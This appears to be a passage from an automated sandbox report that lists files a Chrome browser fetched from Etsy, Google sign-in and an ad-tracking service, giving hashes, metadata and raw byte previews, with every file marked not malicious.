                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................F.........................!.1A."Qaq.#2..B...R..3b..$Cr..4....S..%c....................................9......................!..1.AQ"aq...2.....#BR...r...3.$.............?....2...=...8...K..$L.$.`.8..>......cd...c.<}y..8i#W,#.)+.!.j..&Ot....#f.C.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):15676
                                                                                                                                                                              Entropy (8bit):7.979761666486796
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:D0AF3DA1A75E429C87A472381B3E9EC2
                                                                                                                                                                              SHA1:A524B47E8190A4BC7542C1A485F35F60B14A82BD
                                                                                                                                                                              SHA-256:90683E7AA1713681D92DC619FBB369A045A03154D10BADEC6F4DB804158B080E
                                                                                                                                                                              SHA-512:DB1996D69E20DFFCDDC8C1730E91F3194B59893D34D2AE63D78669F650307842A7CA4457856204D90378C050BAA2E6F5DB99A82EE0A500FFDC3FCD03DAA565A3
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/24719125/c/2000/2000/0/0/il/190a0f/4157107940/il_600x600.4157107940_eh8l.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................<....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma.................<6mdat.....&ey_.....2.xDd.a..P...:%...?5>.e1..j$.E...Q...I..gvL.\.~[\....u....&..4...5p......+..)`...DE-d#.v.x.T.v.v.x.[..G..q.s>.....X.......Ho....N..Y..~.W.&F...6)....X.`..TcD~..}...W.0..M.:...@.W...........D^......S.. .!.LZ....}.#.a..M...?..-..6...U.*...v@U(...;A|.#;...kx.$Q.|..I]'...dm%.q......O.!.L......^.V.........>.J...(....L.vS.Y..q.J....'..K.....I......E.3@....Y.5..o..)..E..U.\.o.K.)P. ./U...{.M./A'8DX(v...S.O..g$....."....N.m,.b....it58.*8...>.....>.!..s...d...Q{.h....e.....e).{...q.7$.EN...x...9..kG(....W.2..'X.Xj4*......f..z...o...t'...xY..T).iz....`M,N?..2W&.-..y..K7..+.......cA.......6n.....:..yV...x. =.....Q.... ....2....w.&.._p,.b5g.X%Z.*L.:.! .+...DJO....@x=..X2...!..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):103816
                                                                                                                                                                              Entropy (8bit):7.996805911546505
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:5AB9E1520B81007A5BFC36F2CE4C90FD
                                                                                                                                                                              SHA1:731FF980F98BA2906C93A95CB46ACD38CD6E82D1
                                                                                                                                                                              SHA-256:433CF1978282146C6D86030B0DFC144673E6CE671FFD7506D4DB81C7CB9C1B11
                                                                                                                                                                              SHA-512:EEE174C71A25F50703B8DA2B256CB2A81B6484A25009FA5C86CCF340F9F77B02094C1E3196DBB835D317BDB12B0533FB320A97A16D218304F6C45EF9705B7080
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iap/115f7e/5730779708/iap_600x600.5730779708_pd9wuotz.jpg?version=0
                                                                                                                                                                              Preview:RIFF....WEBPVP8X.... ...W..W..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..VP8 N....v...*X.X.>9..C"!..... .....lkr..b.A..!.........o.......4......S.{.........._.......?.}.?_...............3.....[...7...>........Q.A...............?,....~...~..........#.....x0....../?..+.....#...........{....?......7......9........x[../.....?...............%.?.....{..y.o.?.?....I.......z.......s?`?.?....#.........B.....c.......?.,~.?......o.'./......G..........................._..._...?..?.0...y...+......U...?1.3.TJ.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):95844
                                                                                                                                                                              Entropy (8bit):7.963938462936827
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:5A387FDDBF754F4D5CA73BB85C5CC81C
                                                                                                                                                                              SHA1:49965B54145053698BE3754037E4AC4A26B43650
                                                                                                                                                                              SHA-256:793C453396D588F4CE6DB8D33FA1403DE41FDAA1E050540B7D76078173557AD7
                                                                                                                                                                              SHA-512:0D28AB13C82FC37E7A9BEB4453381BAD6C642DE87DBF08182CDBCA555BFBCF2975EA25E0B70034E5173231F52C9897ED80690F22F5402A5D854288DF62092DF9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................C.........................!.1A."Qaq..2.#B....R3b...$r...C.%4S.....................................7.......................!1.AQ"a..q..2...R.B......#3rS.............?.......-..)......$......R9.|Rq..o..r1..;sG.@8....r.IQ.....FO...O..R....q..y...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):94026
                                                                                                                                                                              Entropy (8bit):7.97847991776671
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:A51300F73598EBFFDCD05100AB83D981
                                                                                                                                                                              SHA1:FC60A2DCC2662ECBD21963C080EA8C848E4688E1
                                                                                                                                                                              SHA-256:7FFCCB96A11F9CC87B3AD450A5E516D8BCEEA0BED4739EC8366AB1D65362CEBC
                                                                                                                                                                              SHA-512:09CCC6B8A4D400AD9293AD9BA36CC5985FF4873E0865CCEE523E26C4AF018F6E49011434C463C10C33D6B11B0831E3E0003CD94DF51BD4D4615342DDC2F558E4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......X.X..".........................................N.........................!.1."AQaq..#2B...Rb...3r..$C...4S...cs.%T..5D.Ed....................................7........................!1.AQ."a.2q...#BR.3.$Cb..DS..............?....|.........NsX S.....CK.'.....[3.^.)[}(BF3I.[..qK.(Bk....F..{~..c.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):9014
                                                                                                                                                                              Entropy (8bit):7.956318429043016
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:7FA9B6663362B623267EDBB32728223B
                                                                                                                                                                              SHA1:030C055718736445CDECC010E893229923500DE5
                                                                                                                                                                              SHA-256:AE1C5CA16D7395130388C525C01785A11C67BF7F63933F50481FFCE02E763FFE
                                                                                                                                                                              SHA-512:28B7926BD52B472C16DF6F36F3B15AAB8146A2575FD4326FD1AFFB0E85F13847ECA7D17DB09015F05998F4817720D5A64DDD94D106E4A2F582580B204761C24F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iap/14f6ae/6076138282/iap_200x200.6076138282_ho9xijqn.jpg?version=0
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.................."(...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe................pixi............ipma................."0mdat......... !..2.D.....!@.GM..QF.5[.S~.B..o}aM...,.U.......\%.A.X....B)R?......k."...uNr..]...h].*Hp.....r;..p5.s..q,6...k.@..-.?K.h05,Yv."..&......`.rE.._.{..J..%....R.....5.Y%.s....I&PE..,..|..(..v.ao.Cs.....z....dd...J ....'.E.ig.l...F...g....He.fp..1[.>....~Q.B..0J....$..>..P.......t.C....].NOH_.AI.ZG..}..+...t..a..s..#b...0JM..(.S.\......S|Z....|$.wW...HQ`2.+.*./'.KX6.#..F.......X.)......8.$.Z..q@.M....".........:....l........... .X....."..y._bhB...=.p...,...Qi....A....a9I.f .j.+Tk/...@..+W.WL.T.Gw(x.^,.......D..+..G...~i.#.b,f..S.v.....P..V\G.w.P.^9j...Mx....O..{....<.N_.....k.|.......duV..s.~.$"..Y.w..[u..-..i...!. .`..s.B.......-#..~.*.....4...W\.]....Y...E.a<1.C...^1$./.%a.. l`....v.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):2886
                                                                                                                                                                              Entropy (8bit):7.7944635713927095
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:25CF529B91F7384F363F2DEC1A6950DA
                                                                                                                                                                              SHA1:1A4FA48BE00063AF8250DC8FC5B51CFAE2069B09
                                                                                                                                                                              SHA-256:0EEC055C7C80F7AC439C9AA9604235DFA99C81278882FCC9029BDEE57D9561B4
                                                                                                                                                                              SHA-512:D0B3589020F968CFDA6A8EFABF70BAB8AB648CC28C531A11B62534AA789C9DDABB47F7EEC7D9B41946DA9A547B7F003480A68A68CF83EF04A2161DAC0A4A744D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/36930623/r/il/1a9005/6304447928/il_100x100.6304447928_q6zv.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@...................8...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......d...d....pixi............ipma..................@mdat........`...B2.......a@.7....-.._.....>,\.!y..E56L.@.....2.r.....k.l .5eO.. F.K....d"...}|.,.an......R..Q..x#.j....i..z...u.....Gk9............"..F!....mH.R.?X}Z|p..+{=z.:t.Uu...v.w@bO*......K...+ .mol'.^....>.D.`...P.6....2....KsY'.$.yd.9.\..Z...Y./.~....u'.bw.'!...>*.....>n.....N..u:.`.........R.2PP1.6...."Uy.y.R.9.....,....~.JN^d........"....Bv......C..(..O...7Gt..........P.e.B.Xh..........Ac...*5XA.d.D...]..O...._..bs.&{T....JP%7..a.0W...K.T....,..\.k>.t...-.|...1..v*}...d)_1"."....xX..+....:m....3.owU.'H...'.&.T0..:...v......0;....|%.....a..Z}t....`..n......la.G/uN`....c.?...F.....l.k.O.O..(...^a...^.L|!......X..|.B..K.cp..=....(.QxO..r..Eu..lB.....|...)..r\D..a..O<..qa5..98...^....(m}....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 50x50, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):422
                                                                                                                                                                              Entropy (8bit):7.4367739913961
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:17E2B53BC3C6E810AC04C37824B14F73
                                                                                                                                                                              SHA1:0CCA06562187F0D3A31A6C68601BCAB1D4B84C01
                                                                                                                                                                              SHA-256:17FDA0AA8B0900369E8AFCA3EEB6507DEE3C686860E7C7A95DC4A983C08297B1
                                                                                                                                                                              SHA-512:BC0901C37DE92AD2987D84E3CE1AE67F564106D9F8F6560F0D40B64B4D3F030CC64E4B782E961991B84C2DCB95DA95CB9CD199A335838194327B85D57E9E434D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iusa/389418/101372477/iusa_50x50.101372477_pv2r.jpg?version=0
                                                                                                                                                                              Preview:RIFF....WEBPVP8 .........*2.2.>.^.O'.#.$.....c..Xd..Y....X.f..3+....N[SM..H..|...$b..D....R......t?.......X..n......,.P....=..?u{..}[_iMo.3....{eEC| ....LF"..g.g.\......_..1.!.i...Q.....y-..B.....bi..C.Q.Y.._..K.,...g..g....b..B;...l...P.....fZ...f.u...8/HNJ-M..L.c.VG..z..c...^..^.o........z^.&..e6.-......W.v..S.:u.h..C#.C.N.Pz^..y.k.(\.t..+.y.";...~.....LO...WN.m.z.......~3!.N..!..7.(q.....+V...x..`.....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):23771
                                                                                                                                                                              Entropy (8bit):7.94851527971986
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:F088E0F20048141EAE940E80756059AF
                                                                                                                                                                              SHA1:3C256821E09E561EB90EC898A2160D844043C0B2
                                                                                                                                                                              SHA-256:CDCFE2F904FAD9E77E679F11CB64F96D879121BD11CD70B77EA39736DBA50C77
                                                                                                                                                                              SHA-512:B9278F8F8CB8FFF32B5B67093F587C7D4A1F4CAF4DFC7AF34292338DDE1F6A5CD7EFF4C517F72DA9F68063E2F41FAE562DA5A597FBA2D9D04E53D55A9EA55B72
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......,.,..".........................................>........................!..1A."Qa.2q.....#BR..$3br....C.4D..................................7........................!1AQ..a"2qB....#Rb...r.3C................?..s]...q.%.+..y...P.....f7{.....\..h..&..i...?Z.{..Eg....k.e'.B.....'.9..v.4..o.....l.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3463
                                                                                                                                                                              Entropy (8bit):7.517049760946101
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:16497737550AA9DEA248B175DE8ADA71
                                                                                                                                                                              SHA1:E6EA48EADABC67DCF959A0537B45D567615CBC71
                                                                                                                                                                              SHA-256:71B61BF46399BC488B8574D9DB0DF320E995E3596CEC71274AFB1260FBBE26F0
                                                                                                                                                                              SHA-512:AB096DD189ACF4B9E92D57A27E1F970524563037A9FF34CAC25E837984A2D10FF3015D9EF84151E305F7CA3BD1D4DB9043187B5022B92230C10C3BD88B48A5FF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......d.d.."........................................8........................!1.A.Qaq.."2B.......#$3R.Cb....................................1.......................!1...AQaq".....R....#3..............?..?.[.@..V.`.ML.G8........1.m.EB.Q..;Q.y.t...s.....N...3N........c.....F...YA.#4<...F+?*....".n]
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (533), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):533
                                                                                                                                                                              Entropy (8bit):4.933115570682282
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:FEB698008C36A09DFE88AB06A1C3E3B9
                                                                                                                                                                              SHA1:A871FBCBBE298AE7078D06627708B2C106A0FAF3
                                                                                                                                                                              SHA-256:1C4E7E389D73C6ACF7F19CC812514E71230740791FDE8A018C1D7EDCCF1590AE
                                                                                                                                                                              SHA-512:F8E3CA3E49B1C027232D1B3AAB82B5430F4A69334A5E18BEB4469C39D6A24D3F4D3FA4C473F360B619CE734977F0D7EFD03BE6ACB5EB7B9F69295FB2CBF94D9B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://accounts.google.com/gsi/style
                                                                                                                                                                              Preview:#credential_picker_container{border:none;height:330px;position:fixed;right:20px;top:20px;width:391px;z-index:9999}#credential_picker_container iframe{border:none;width:391px;height:330px}#g_a11y_announcement{height:1px;left:-10000px;overflow:hidden;position:absolute;top:auto;width:1px}.L5Fo6c-sM5MNb{border:0;display:block;left:0;position:relative;top:0}.L5Fo6c-bF1uUb{-webkit-border-radius:4px;border-radius:4px;bottom:0;cursor:pointer;left:0;position:absolute;right:0;top:0}.L5Fo6c-bF1uUb:focus{border:none;outline:none}sentinel{}
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):93530
                                                                                                                                                                              Entropy (8bit):7.969739458997922
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:89C88C0EC4F13F9E1CB9F38CF161272B
                                                                                                                                                                              SHA1:ADECCE9CE8FB1E0C1D3A6D2BC70A7A99AF3C04A5
                                                                                                                                                                              SHA-256:699389A67D97FA0572D2B3146FE0F1FC7DB54F4718CF2CA9FF6A10CC0C7ADFA8
                                                                                                                                                                              SHA-512:6B9DE12A6A32A578CB971ED005E0FB15F1EAD8715F8DF4EADEFCEA129EE5E0FFDE38803413353114170064FB6747512BE2D8F10E906D390B4272821CDD60C538
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................G.........................!.1."AQa.q2...#B....Rb..3r...$C..Scs%4..D...................................A........................!.1AQ."aq....2BR....#.b3r..S..$C.4DTc.s............?..!....C.5U.......*...P.*U..n..*.eo..T.DV.f..*.9.P.)R.VP.&.*.kx.V.iR
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):2704
                                                                                                                                                                              Entropy (8bit):7.779155440271211
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C8B6142BEC7D3452C0BF1ACBCB491021
                                                                                                                                                                              SHA1:3A22684FA535DA5DA588AB028028C2A19FB20FA6
                                                                                                                                                                              SHA-256:469197A8E88AF482FE84C6F063A0E3F9866206068373CD7D738C4F59AF236D5E
                                                                                                                                                                              SHA-512:72A682499550988A42390194B606D9B16D39B5EF6D6E6297A6FB16F0E74872448EA64B3E9438F5EC7FF7DC774B6876526D4B8462EE200BE1C2BC7E019B677123
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/20088202/r/il/5a6788/5039837286/il_100x100.5039837286_mzzi.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......d...d....pixi............ipma...................mdat........`...B2.....I$.@.+...:...Z1bW...M@.r....M-....,.,.n..L...G..h8.)..N.1..D.v*uq.g.c.......*..n.;.i...b.K[vK.b....ra6......j..o.[.....~.^T._..L.S.d.q.uq........j..2Z.Ju..4..2...a4...nrF...(v.F..eF....2.@V...........Y....5.....-.*5o.5./Z..2...P._...>&.I/o.W.K....j.@.5.3+..2..}.D..$.!.....D.....I..Zz.jr...?.@}C+D.b.`". N...uQ..?R.<..A...h.GVB....-^....'.Oy....k?.mZ.2..g49$..~I....l....e.t..#.$.0U|.7.Q^#.....W..........e..Qn.f.B~.../F}..K..9C.....,x....#$.7BiA.;...$....J$...N.{.9.3.t..-=1P...m..]rf.d.Q.m..S.|....)....1L.5..UxG{....Sdg....0^k.)...=.....l.mx..;.dHe{=.3.k.A<.ZI.6QJ/..#.t.@.MDzy.G).:.Dr;571.Q.H.....k...G......X.\...}@?.x../8...Y.-..5-..d.g....3.....{L6..AaN.e..?d...Ykz.\Q.....V.j8..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):34716
                                                                                                                                                                              Entropy (8bit):7.99225680644006
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:BF32D37ABCF933570505DF7D96CB0F44
                                                                                                                                                                              SHA1:0B072C4CD53639BEB2015264E5F0E64A74385CC9
                                                                                                                                                                              SHA-256:03DE7111631C2896AEFA34BF24769F59094B0656F29E42990B51A6C0FC7D7D37
                                                                                                                                                                              SHA-512:D78C4A0B2B268E285B03FF26344F3DB48367997FAE82F2C73BC4B5AE71A64607537B3D3EBAA187F409CE9940D47B9D7A1957A494F09D5CA32BD522C4D716A7EB
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iap/ceb90e/5362414707/iap_600x600.5362414707_2vs0z7br.jpg?version=0
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma...................mdat.....&ey_.....2.... ...A@..c..Dj...r)..,.F.I.a..l#.D....=..N.B...t.Ezk.<R.?jG....j`.g..8X*.z..K.Q...Ix5.}.pSeO.w.8..u..b.)vD....2!o.y.s|..I...`..AZ..VN.4.....[+^nv......~u..~SN.... .5.A)..q.. .Z..>*..3.,....z8.O..R<.....=.r.t......./.R.YU../.#.).....o.6............|HY..1..dm4.....<Q*...}v.,..w..h.|..z.km...z.9.i.=...3$...oG....,..)............3.4...F...7..0....~&.|...UnO.8[7%>..Xl.E.7q..MX....jP\Pd.....I...\E..b.t...b&i.`+....]..o.<.....D..*.>....i+..`...f..M../.m.1X.V2.4...p|. ......@.T.......cL{.L.....[.%..l.!._nnu.....o.SL..AM;TY.....r)4..)7.......c.w.-fh..}.K.QI..g.P..0Z...r..!.s.e.MJ..R.=. .;!y...T.y..M...U0............r....8..o.7.L.{A .e.s<dW...Ko.6k..n..1(8R[....F !9_.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):391
                                                                                                                                                                              Entropy (8bit):4.502958617524926
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:E136DDC50FA23CA2658886D753EECDA1
                                                                                                                                                                              SHA1:11C81ADFF010E7307D46B329AB45BE9902649C7B
                                                                                                                                                                              SHA-256:A217F69351069DA2AD38A5743662C2713469C2AD262217031D2EA890158FE434
                                                                                                                                                                              SHA-512:C1B3F6BDB60A789816845B9856B6DCA110AE4B1C6F37345866A744D1BC41515F314AD8144AE389F41050336522D0D007C5232E185C2A1C1087E9FEC7DDB089F4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://insight.adsrvr.org/track/up?adv=r09jr34&ref=https%3A%2F%2Fwww.etsy.com%2F&upid=c6e9qnb&upv=1.1.0&paapi=1
                                                                                                                                                                              Preview:.<html>.<head>. <script type="text/javascript" src="https://js.adsrvr.org/universal_pixel.1.1.0.js"></script>.</head>.<body>. <div id="universalPixelContainer">. <script type="text/javascript">. (function(global) { . var ttdcm = new TTDCM(); . ttdcm.init( [] );. })(this);. </script>. . </div>.</body>.</html>
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):56799
                                                                                                                                                                              Entropy (8bit):7.995740109533093
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:ACB5DF79C2002261420E1817444FF14D
                                                                                                                                                                              SHA1:968E4AC267D7924EF6B0EA4AE6577D00670C7FA4
                                                                                                                                                                              SHA-256:125A47506E7028F99E8FE961044140787518AB67F409CB5F2415DA88181E9448
                                                                                                                                                                              SHA-512:EF930DB9BF1051045068F11C383FADCA0293A95FA92AB8BAF6D9ECC835CCE6A572B135756CBF2FEA32D429564149BAAF3473F4AAECAA8580E156E0E380EB87E1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/25818753/r/il/0f4a14/6368253381/il_600x600.6368253381_951m.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma...................mdat.....&ey_.....2....p.E.Q@...m..)..12P.j..s......'^.p..-F..I...W..y..L.>..?t..`..-....z..fV{.....c~...'y.].H...B..zC.x..... .w).......Vw...0.r..D ..m.e..._..k.._R.#.qh.....i..K.xOb.....D3...i..m..x.l.|5_.....l..h.N.r.(..i:..y.d."st.....HN..1......}..;n'.Rm..Z...M.y.w..6F...G..........W3.f#.5..\..G..qBZS..l...|d..L.......X5.u.T%...........o.5...Cr...=..J....#..W...w.....w..C....O.I^..Y..o0C...W.q|e`.;!.y.od..7...N.c.LC0..Z..GL.'.U.....Q'...%e.D..3V?..l....8.,3.u...>SIY.FF....ScAGX.0Y.X1T..;/..Q.kZl.x.AV......F.....s.v.`$.!.....0f.ue..[]Z.v-.`.f8..d.S.x...s(......3.....P..S.1Hz.e_0.Vz.1{W&.....|.PY<..z...X;......X.(..DXFV...6.>.X.JR ...G....#..s...n,^.....1..u...<..N......J4..K=?V..rPp0.8-.@.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):25980
                                                                                                                                                                              Entropy (8bit):7.988461845637614
